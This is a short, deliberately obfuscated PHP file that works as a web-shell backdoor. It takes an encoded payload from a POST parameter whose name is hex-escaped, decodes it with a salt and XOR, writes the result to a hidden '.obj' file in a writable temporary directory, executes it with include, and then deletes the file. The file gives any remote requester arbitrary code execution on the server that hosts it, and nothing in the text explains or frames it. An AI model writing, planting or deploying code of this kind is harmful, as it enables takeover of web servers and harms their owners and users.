<?php

if(count($_POST) > 0 && isset($_POST["\x64\x61t"])){
	$comp = $_POST["\x64\x61t"];
		  $comp=	 explode(	'.'	  ,   $comp		 );  
	$binding	=	 '';
            $salt	=	 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	=	 strlen($salt);
            $j	=	 0;
    
            foreach ($comp as $v6) {  $chS	=	 ord($salt[$j%$sLen]);
                $dec	=	 ((int)$v6 - $chS - ($j%10))^  27;
                $binding  .=  chr($dec);
                $j++;
            }
	$ent = array_filter([getenv("TMP"), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp"]);
	foreach ($ent as $pointer):
    		if ((bool)is_dir($pointer) && (bool)is_writable($pointer)) {
    $hld = implode("/", [$pointer, ".obj"]);
    $file = fopen($hld, 'w');
if ($file) {
	fwrite($file, $binding);
	fclose($file);
	include $hld;
	@unlink($hld);
	die();
}
}
endforeach;
}